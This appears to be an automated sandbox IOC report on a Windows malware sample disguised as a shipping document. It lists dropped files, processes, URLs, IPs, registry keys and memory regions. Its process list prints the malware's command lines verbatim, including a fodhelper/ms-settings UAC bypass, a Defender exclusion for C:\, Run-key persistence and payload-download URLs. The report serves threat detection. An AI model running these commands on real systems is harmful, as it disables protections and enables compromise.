IOC Report
710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

loading gif

Files

File Path
Type
Category
Malicious
710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\Public\Glzskrlg.url
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Glzskrlg.PIF">), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\Glzskrlg
data
dropped
malicious
C:\Users\Public\Libraries\Glzskrlg.PIF
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\Public\Libraries\glrkszlG.pif
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat
ASCII text, with very long lines (324), with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\PNO
ASCII text, with CRLF line terminators
dropped
C:\Users\Public\alpha.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\Public\ger.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\Public\xkn.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inu0x2un.w4d.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncfpuwjd.ueg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\agyqwjporhwhb
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv5415.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x50f2d234, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Windows \System32\per.exe
PE32+ executable (GUI) x86-64, for MS Windows
modified
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
"C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe"
malicious
C:\Users\Public\Libraries\glrkszlG.pif
C:\Users\Public\Libraries\glrkszlG.pif
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
malicious
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
malicious
C:\Windows\System32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
malicious
C:\Windows\System32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
malicious
C:\Windows\System32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
malicious
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
malicious
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
malicious
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
malicious
C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
malicious
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\\Users\\Public\\Libraries\\Glzskrlg.PIF
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 2
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
malicious
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"
malicious
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"
malicious
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"
malicious
C:\Users\Public\Libraries\Glzskrlg.PIF
"C:\Users\Public\Libraries\Glzskrlg.PIF"
malicious
C:\Users\Public\Libraries\Glzskrlg.PIF
"C:\Users\Public\Libraries\Glzskrlg.PIF"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Windows\System32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
There are 26 hidden processes, click here to show them.

URLs

Name
IP
Malicious
104.250.180.178
malicious
https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=
unknown
malicious
https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw
13.107.139.11
malicious
http://geoplugin.net/json.gp&c2?
unknown
http://www.imvu.comr
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
http://ocsp.sectigo.com0
unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
unknown
http://www.imvu.comta
unknown
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
unknown
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
unknown
https://www.google.com
unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
unknown
http://geoplugin.net/json.gp/C
unknown
https://maps.windows.com/windows-app-web-link
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
https://live.com/
unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
unknown
https://login.yahoo.com/config/login
unknown
https://c6c4bq.db.files.1drv.com/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WCXM5X
unknown
http://geoplugin.net/json.gpV
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
unknown
http://geoplugin.net/json.gp_
unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
unknown
https://www.office.com/
unknown
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
unknown
https://sectigo.com/CPS0
unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
unknown
http://geoplugin.net/json.gpj
unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
unknown
https://c6c4bq.db.files.1drv.com/_wR;
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
unknown
https://c6c4bq.db.files.1drv.com/y4muza8-AaN89J3KOPjgz4xuHsRw8GpbmeCTYrNNV8GxQvY6QuZ4f4Rksz00DRpN4rZ
unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
unknown
https://c6c4bq.db.files.1drv.com:443/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WC
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
unknown
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
unknown
https://live.com/d
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
unknown
https://www.google.com/accounts/servicelogin
unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
unknown
https://aka.ms/pscore68
unknown
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
unknown
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
unknown
http://www.pmail.com
unknown
http://ocsp.sectigo.com0C
unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
unknown
http://www.ebuddy.com
unknown
There are 61 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
onedrive.live.com
unknown
malicious
c6c4bq.db.files.1drv.com
unknown
malicious
dual-spov-0006.spov-msedge.net
13.107.139.11
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
104.250.180.178
unknown
United States
malicious
127.0.0.1
unknown
unknown
malicious
13.107.139.11
dual-spov-0006.spov-msedge.net
United States
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Glzskrlg
malicious
HKEY_CURRENT_USER\SOFTWARE\CorelDraw-OW5ET7
exepath
HKEY_CURRENT_USER\SOFTWARE\CorelDraw-OW5ET7
licence
HKEY_CURRENT_USER\SOFTWARE\CorelDraw-OW5ET7
time
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
NULL

Memdumps

Base Address
Regiontype
Protect
Malicious
929000
heap
page read and write
malicious
7EC30000
direct allocation
page read and write
malicious
97D000
heap
page read and write
malicious
26E20000
direct allocation
page execute and read and write
malicious
796000
heap
page read and write
malicious
2A20000
direct allocation
page execute and read and write
malicious
78C000
heap
page read and write
malicious
22FE30A0000
heap
page read and write
28BE74B0000
heap
page read and write
19B5678000
stack
page read and write
7FF70CC70000
unkown
page readonly
7FF70CCCD000
unkown
page readonly
22A45B35000
heap
page read and write
62F000
heap
page read and write
2990D990000
heap
page read and write
7F6A0000
direct allocation
page read and write
935000
heap
page read and write
7FF70CCA2000
unkown
page readonly
27570000
heap
page read and write
2C476085000
heap
page read and write
769497F000
stack
page read and write
14171373000
heap
page read and write
7FDEC000
direct allocation
page read and write
23BBA9C0000
heap
page read and write
2692E000
stack
page read and write
1FEF10D6000
heap
page read and write
23BE14D000
stack
page read and write
7FF70CCBF000
unkown
page read and write
2990FEE0000
heap
page read and write
97D000
heap
page read and write
93C000
heap
page read and write
9B5000
heap
page read and write
9B000
stack
page read and write
27570000
heap
page read and write
963000
heap
page read and write
28F3000
direct allocation
page execute and read and write
7FF7E0A31000
unkown
page execute read
908E5FC000
stack
page read and write
908E3F6000
stack
page read and write
2675A000
stack
page read and write
7FF70CC70000
unkown
page readonly
7FF70CCBF000
unkown
page read and write
14171310000
heap
page read and write
2C23B320000
heap
page read and write
2762E000
stack
page read and write
7FF70CCCD000
unkown
page readonly
942000
heap
page read and write
7EEDF000
direct allocation
page read and write
265D3000
direct allocation
page read and write
21C513C7000
heap
page read and write
7EEE0000
direct allocation
page read and write
24E03BE0000
heap
page read and write
3C01A000
heap
page read and write
7FF70CCBF000
unkown
page read and write
7F532000
direct allocation
page read and write
1417138B000
heap
page read and write
7FF6FEF91000
unkown
page execute read
91F000
heap
page read and write
938000
heap
page read and write
91C000
heap
page read and write
947000
heap
page read and write
7FF70CCCD000
unkown
page readonly
277A3000
heap
page read and write
7EDF0000
direct allocation
page read and write
99F000
heap
page read and write
931000
heap
page read and write
1F4391A0000
heap
page read and write
7FF70CCB9000
unkown
page read and write
1E892260000
heap
page read and write
7FF70CCAD000
unkown
page write copy
1417138B000
heap
page read and write
8AE000
heap
page read and write
590000
heap
page read and write
1AC39D87000
heap
page read and write
40100000
direct allocation
page read and write
2751E000
heap
page read and write
1F0000
heap
page read and write
7FF70CC71000
unkown
page execute read
2990D9B3000
heap
page read and write
934000
heap
page read and write
263A000
direct allocation
page read and write
928000
heap
page read and write
7FF6996CD000
unkown
page readonly
3F7FC000
heap
page read and write
7F380000
direct allocation
page read and write
1F43AF49000
trusted library allocation
page read and write
2695F000
stack
page read and write
22FE30D5000
heap
page read and write
9B5000
heap
page read and write
94A000
heap
page read and write
1FEF10EC000
heap
page read and write
27088340000
heap
page read and write
3C230000
heap
page read and write
26A9E000
stack
page read and write
2383000
direct allocation
page read and write
217FF3A0000
trusted library allocation
page read and write
193000
stack
page read and write
938000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
7FF70CCA2000
unkown
page readonly
7FF70CCAD000
unkown
page read and write
21C512C0000
heap
page read and write
8FB000
heap
page read and write
979000
heap
page read and write
2C475DA0000
heap
page read and write
1F43A9C0000
trusted library allocation
page read and write
7EF7A000
direct allocation
page read and write
22A45850000
heap
page read and write
274FD000
heap
page read and write
10DE85D0000
heap
page read and write
19B57FE000
stack
page read and write
456000
system
page execute and read and write
24FA000
direct allocation
page read and write
7FF70CCB1000
unkown
page read and write
584000
heap
page read and write
26E01300000
heap
page read and write
6F0000
direct allocation
page execute and read and write
2653A000
direct allocation
page read and write
2374000
direct allocation
page read and write
7F590000
direct allocation
page read and write
26E1F000
stack
page read and write
26FEE000
stack
page read and write
3CCACFC000
stack
page read and write
14171300000
heap
page read and write
19B587E000
stack
page read and write
7FFD9BC90000
trusted library allocation
page read and write
19B54FF000
stack
page read and write
217FD59F000
heap
page read and write
7FF70CCA2000
unkown
page readonly
1F439120000
heap
page read and write
7FF70CCB9000
unkown
page read and write
14155414000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
76949FF000
stack
page read and write
1F453110000
heap
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
22F6000
direct allocation
page read and write
2750E000
heap
page read and write
7EC10000
direct allocation
page read and write
700000
heap
page read and write
931000
heap
page read and write
7FF70CCAD000
unkown
page read and write
91C000
heap
page read and write
27088345000
heap
page read and write
7F440000
direct allocation
page read and write
166CFD00000
heap
page read and write
3FAEE000
heap
page read and write
7FF70CCC9000
unkown
page readonly
6B0000
heap
page read and write
1FEF10CF000
heap
page read and write
24E03B50000
heap
page read and write
1E892287000
heap
page read and write
A3F000
stack
page read and write
1AC39D6A000
heap
page read and write
217FEE60000
heap
page read and write
7FF70CCC9000
unkown
page readonly
24C0000
direct allocation
page read and write
2940000
trusted library allocation
page read and write
9D5000
heap
page read and write
7FF70CCCC000
unkown
page write copy
A40000
heap
page read and write
7FF7E0A40000
unkown
page readonly
7FF70CCA2000
unkown
page readonly
3DD7EFE000
stack
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
A8DC17F000
stack
page read and write
908E27C000
stack
page read and write
27518000
heap
page read and write
7FF70CC70000
unkown
page readonly
1F43B05E000
trusted library allocation
page read and write
945000
heap
page read and write
7FF70CCCD000
unkown
page readonly
7FF7E0A84000
unkown
page readonly
1AC39D83000
heap
page read and write
1FEF3710000
heap
page read and write
908E57D000
stack
page read and write
2641000
heap
page read and write
7FF70CCC9000
unkown
page readonly
22FE2ED3000
heap
page read and write
6E0000
heap
page read and write
166CFDCA000
heap
page read and write
27571000
heap
page read and write
59E000
stack
page read and write
1FEF10EC000
heap
page read and write
22A45AE0000
heap
page read and write
5E3000
heap
page read and write
584000
heap
page read and write
3FAB2000
heap
page read and write
270880E4000
heap
page read and write
7FF70CCC9000
unkown
page readonly
7FF70CCC9000
unkown
page readonly
7FF70CC70000
unkown
page readonly
7FF70CC70000
unkown
page readonly
1BD753C0000
heap
page read and write
274F0000
heap
page read and write
416000
unkown
page readonly
217FD5BB000
heap
page read and write
624000
heap
page read and write
7FF70CCC9000
unkown
page readonly
7EEE0000
direct allocation
page read and write
2796B000
direct allocation
page execute and read and write
7FFD9BA5C000
trusted library allocation
page execute and read and write
19D000
stack
page read and write
938000
heap
page read and write
1F43B029000
trusted library allocation
page read and write
7FF70CCA2000
unkown
page readonly
265D8000
direct allocation
page read and write
2391000
direct allocation
page read and write
7FD58000
direct allocation
page read and write
3FB42000
heap
page read and write
1F453440000
heap
page read and write
3FAD1000
heap
page read and write
2750E000
heap
page read and write
4D0000
unkown
page readonly
7EDF0000
direct allocation
page read and write
2990D7F0000
heap
page read and write
1DFC9660000
heap
page read and write
98A000
heap
page read and write
9C0000
heap
page read and write
1F43AF95000
trusted library allocation
page read and write
26A2F000
stack
page read and write
27570000
heap
page read and write
7FF70CCAD000
unkown
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
B2389CE000
stack
page read and write
26546FE000
stack
page read and write
7FF70CCA2000
unkown
page readonly
27570000
heap
page read and write
7F4D0000
direct allocation
page read and write
217FD4F0000
heap
page read and write
7FF70CCCC000
unkown
page write copy
4AA000
remote allocation
page execute and read and write
19B5579000
stack
page read and write
7F654000
direct allocation
page read and write
7FF70CC71000
unkown
page execute read
3321D0C000
stack
page read and write
7FF70CCC9000
unkown
page readonly
1F44AF10000
trusted library allocation
page read and write
921000
heap
page read and write
2990D826000
heap
page read and write
3FCE1000
heap
page read and write
1FEF1040000
heap
page read and write
7FF70CCC4000
unkown
page read and write
26D1E000
stack
page read and write
3CCADFF000
stack
page read and write
22A45790000
heap
page read and write
4B1000
remote allocation
page execute and read and write
708000
heap
page read and write
2C476080000
heap
page read and write
19B52FE000
stack
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
279B1000
direct allocation
page execute and read and write
27570000
heap
page read and write
B2388CB000
stack
page read and write
22A458B9000
heap
page read and write
14173300000
trusted library allocation
page read and write
33221FF000
stack
page read and write
1F43A9A0000
trusted library allocation
page read and write
7FF70CCBF000
unkown
page read and write
700000
heap
page read and write
1F453023000
heap
page read and write
94A000
heap
page read and write
27571000
heap
page read and write
3BE75000
heap
page read and write
76945AB000
stack
page read and write
217FD4D0000
heap
page read and write
7EEDF000
direct allocation
page read and write
23BE4FF000
stack
page read and write
7FF70CC70000
unkown
page readonly
3FAF2000
heap
page read and write
2C23B605000
heap
page read and write
217FD5CD000
heap
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
624000
heap
page read and write
26A8E000
stack
page read and write
1FEF1123000
heap
page read and write
41B000
system
page execute and read and write
7FF70CCB9000
unkown
page read and write
7FF7E0A84000
unkown
page readonly
2990D826000
heap
page read and write
1F4530AE000
heap
page read and write
96B000
heap
page read and write
7FF70CC71000
unkown
page execute read
631000
heap
page read and write
2393000
direct allocation
page read and write
92E000
heap
page read and write
217FD5AA000
heap
page read and write
236D000
direct allocation
page read and write
690000
heap
page read and write
910000
heap
page read and write
23BBAC44000
heap
page read and write
7F5D0000
direct allocation
page read and write
7FF70CCB1000
unkown
page read and write
2250000
heap
page read and write
C8416FF000
stack
page read and write
5C5000
heap
page read and write
400000
unkown
page execute and read and write
1DFC9630000
heap
page read and write
1F0000
heap
page read and write
7FF70CCAD000
unkown
page write copy
166CFD70000
heap
page read and write
6A0000
heap
page read and write
1F43B02D000
trusted library allocation
page read and write
7FF70CCA2000
unkown
page readonly
27571000
heap
page read and write
996000
heap
page read and write
3DDC0000
heap
page read and write
26E94000
direct allocation
page execute and read and write
1F43B019000
trusted library allocation
page read and write
1DFC968E000
heap
page read and write
3FAEF000
heap
page read and write
2C23B41B000
heap
page read and write
22A457B0000
heap
page read and write
2871000
direct allocation
page execute and read and write
267EF000
stack
page read and write
5ED000
stack
page read and write
62A000
heap
page read and write
1FEF13A0000
heap
page read and write
265DA000
direct allocation
page read and write
3FC60000
heap
page read and write
14171330000
heap
page read and write
1F4530CA000
heap
page read and write
270EE000
stack
page read and write
9C9000
heap
page read and write
7FF6996D6000
unkown
page write copy
7FF70CCA2000
unkown
page readonly
9C000
stack
page read and write
96C000
heap
page read and write
7FF70CCAD000
unkown
page read and write
7FF70CCB1000
unkown
page read and write
1F438F60000
heap
page read and write
7FF70CCA2000
unkown
page readonly
217FD5DB000
heap
page read and write
265467B000
stack
page read and write
B882EFF000
stack
page read and write
1C7CC268000
heap
page read and write
620000
heap
page read and write
CD5A97F000
stack
page read and write
A5D000
heap
page read and write
7F3F0000
direct allocation
page read and write
1F439040000
heap
page read and write
7ED3F000
direct allocation
page read and write
141715AC000
heap
page read and write
942000
heap
page read and write
3FC75000
heap
page read and write
678000
heap
page read and write
265E1000
direct allocation
page read and write
25A1000
heap
page read and write
7FF70CCA2000
unkown
page readonly
7FF70CCCD000
unkown
page readonly
44B000
remote allocation
page execute and read and write
27571000
heap
page read and write
E505CFF000
stack
page read and write
58E000
stack
page read and write
26E0101B000
heap
page read and write
237C000
direct allocation
page read and write
27571000
heap
page read and write
14155060000
heap
page read and write
7FF70CC71000
unkown
page execute read
8FF000
stack
page read and write
279B4000
direct allocation
page execute and read and write
7FF70CCAD000
unkown
page read and write
3FC80000
heap
page read and write
7FF70CC71000
unkown
page execute read
7F2C0000
direct allocation
page read and write
1417137A000
heap
page read and write
19B537D000
stack
page read and write
4C7000
unkown
page read and write
1F43AF23000
trusted library allocation
page read and write
1FEF10C0000
heap
page read and write
4C7000
unkown
page read and write
14171376000
heap
page read and write
45C000
unkown
page read and write
4C7000
remote allocation
page execute and read and write
80F000
stack
page read and write
2398000
direct allocation
page read and write
217FD5AA000
heap
page read and write
3CCAEFF000
stack
page read and write
7FF70CCB5000
unkown
page read and write
A56000
heap
page read and write
2990D836000
heap
page read and write
93A000
heap
page read and write
A8DBD8B000
stack
page read and write
2990D810000
heap
page read and write
1BD75360000
heap
page read and write
B882CFD000
stack
page read and write
24E03C1A000
heap
page read and write
618000
heap
page read and write
7FF6FEF90000
unkown
page readonly
2748000
heap
page read and write
7FF70CC71000
unkown
page execute read
7FF70CCCC000
unkown
page write copy
7FFD9B9A4000
trusted library allocation
page read and write
23A1000
direct allocation
page read and write
2990D82A000
heap
page read and write
3FCB2000
heap
page read and write
1E8921B0000
heap
page read and write
26E00F90000
heap
page read and write
7FCD8000
direct allocation
page read and write
A8DC07E000
stack
page read and write
92D000
heap
page read and write
550000
heap
page read and write
95B000
heap
page read and write
7FF70CCC4000
unkown
page read and write
7FF70CC70000
unkown
page readonly
40101000
direct allocation
page execute and read and write
27571000
heap
page read and write
22A45857000
heap
page read and write
7F53F000
direct allocation
page read and write
21C513A0000
heap
page read and write
1AC39D87000
heap
page read and write
19D000
stack
page read and write
908E47B000
stack
page read and write
7FF70CCAD000
unkown
page write copy
28C3000
direct allocation
page execute and read and write
7FF70CCA2000
unkown
page readonly
4A3000
unkown
page execute and read and write
26BDE000
stack
page read and write
7EEDF000
direct allocation
page read and write
7FF70CCA2000
unkown
page readonly
7F548000
direct allocation
page read and write
7F4B0000
direct allocation
page read and write
6C0000
heap
page read and write
3E54F000
stack
page read and write
95F000
heap
page read and write
261D000
direct allocation
page read and write
26B9F000
stack
page read and write
7EDE0000
direct allocation
page read and write
86F000
stack
page read and write
26603000
direct allocation
page read and write
7ECA8000
direct allocation
page read and write
1E8920D0000
heap
page read and write
2616000
direct allocation
page read and write
14155080000
heap
page read and write
B00000
heap
page read and write
54E000
stack
page read and write
92D000
heap
page read and write
7FF70CCC9000
unkown
page readonly
2460000
heap
page read and write
275E9000
heap
page read and write
2685F000
stack
page read and write
7FF70CC71000
unkown
page execute read
908E4FF000
stack
page read and write
2990D82A000
heap
page read and write
3E90C000
stack
page read and write
938000
heap
page read and write
2990D85B000
heap
page read and write
7FB70000
direct allocation
page read and write
27570000
heap
page read and write
19A000
stack
page read and write
24E03BE5000
heap
page read and write
986000
heap
page read and write
7FF70CCCC000
unkown
page write copy
26547FF000
stack
page read and write
908E2FE000
stack
page read and write
26CDB000
stack
page read and write
1AC39E60000
heap
page read and write
46A000
unkown
page write copy
265DF000
direct allocation
page read and write
5E0000
heap
page read and write
3FAEF000
heap
page read and write
74E000
heap
page read and write
